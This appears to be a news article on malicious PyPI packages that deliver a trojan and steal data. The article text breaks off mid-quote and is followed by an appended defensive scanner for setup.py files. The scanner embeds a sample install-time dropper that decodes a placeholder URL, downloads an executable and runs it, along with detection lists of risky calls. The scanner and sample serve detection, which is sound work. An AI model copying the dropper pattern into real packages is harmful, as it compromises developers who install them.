Malicious PyPI Code Packages Rack Up Thousands of Downloads

The Python code repository was infiltrated by malware bent on data exfiltration from developer apps and more.

Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads – and presumably slithered into installations in various applications.

Independent researcher Andrew Scott found the packages during a nearly sitewide analysis of the code contained in PyPI, which is a repository of software code created in the Python programming language. Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.

Unfortunately, a single malicious package can be baked into multiple different projects – infecting them with cryptominers, info-stealers and more, and making remediation a complex process.

In this case, Scott found three malicious packages: one that delivers a known trojan and two that act as info-stealers.

The trojanized package is called “aws-login0tool,” and once the package is installed, it fetches a payload executable that turns out to be a known trojan, he said.

“I found this package because it was flagged in multiple text searches I did looking at setup.py, since that’s one of the most common
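As an added example (not code from the article, from Scott's analysis, or from any PyPI project), the scanner below applies the same idea as the setup.py text searches mentioned above, but over the parsed syntax tree rather than raw text: it flags install-time hooks (a custom `cmdclass`, or a class that subclasses setuptools' `install` command) together with the downloading, decoding or process-launching calls that an install-time dropper like aws-login0tool, which fetches a payload executable when installed, would need. The two setup.py samples embedded in it are constructed for this demonstration; the encoded URL is a non-resolving placeholder, and the scanner only parses the text, it never executes it.

```python
"""Heuristic scanner for install-time droppers in setup.py (added example)."""
import ast

# Top-level modules whose presence in a setup.py rarely has a benign reason.
RISKY_MODULES = {"urllib", "requests", "subprocess", "base64", "socket", "ctypes"}
# Fully dotted calls that download, decode or execute something at install time.
RISKY_CALLS = {
    "exec", "eval", "os.system", "os.popen",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "subprocess.check_call",
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "base64.b64decode",
}
# Same calls when imported bare (from urllib.request import urlretrieve).
RISKY_BARE_CALLS = {"urlopen", "urlretrieve", "b64decode", "Popen", "check_output", "check_call"}
# setuptools commands that run automatically during pip install.
SETUPTOOLS_HOOKS = {"install", "develop", "egg_info", "build_py"}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return a list of human-readable findings for one setup.py source string."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"unparseable setup.py: {exc}"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    findings.append(f"line {node.lineno}: imports {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in RISKY_MODULES:
                findings.append(f"line {node.lineno}: imports from {node.module}")
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = _dotted_name(base)
                if name and name.split(".")[-1] in SETUPTOOLS_HOOKS:
                    findings.append(f"line {node.lineno}: class {node.name} subclasses setuptools {name}")
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in RISKY_CALLS or name in RISKY_BARE_CALLS:
                findings.append(f"line {node.lineno}: calls {name}")
            if name == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        findings.append(f"line {node.lineno}: setup() overrides cmdclass")
    return findings


def looks_like_install_time_dropper(source):
    """True when an install hook is combined with download/decode/execute activity."""
    findings = scan_setup_py(source)
    has_hook = any("cmdclass" in f or "subclasses" in f for f in findings)
    has_action = any(f.split(": ", 1)[1].startswith(("calls ", "imports")) for f in findings)
    return has_hook and has_action


# Constructed sample: an ordinary setup.py with no install-time behaviour.
BENIGN_SETUP = '''
from setuptools import setup, find_packages

setup(name="example-lib", version="1.0.0", packages=find_packages())
'''

# Constructed sample of the dropper pattern; the encoded URL decodes to
# http://example.invalid/x, a reserved, non-resolving name. Never executed here.
SUSPICIOUS_SETUP = '''
import base64
import subprocess
from urllib.request import urlretrieve
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        url = base64.b64decode(b"aHR0cDovL2V4YW1wbGUuaW52YWxpZC94").decode()
        urlretrieve(url, "payload.exe")
        subprocess.Popen(["payload.exe"])

setup(name="totally-legit-tool", version="0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, looks_like_install_time_dropper(src), scan_setup_py(src))
```

Run it against every setup.py in a local cache of sdists (`pip download --no-binary :all: --no-deps <pkg>` and unpack) and review anything the verdict function flags; the heuristic trades false positives (some legitimate packages do ship custom install commands) for not missing the hook-plus-fetch combination, and wheels bypass setup.py entirely, so it is a triage aid rather than a complete control.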

Read More: https://threatpost.com/malicious-pypi-code-packages/176971/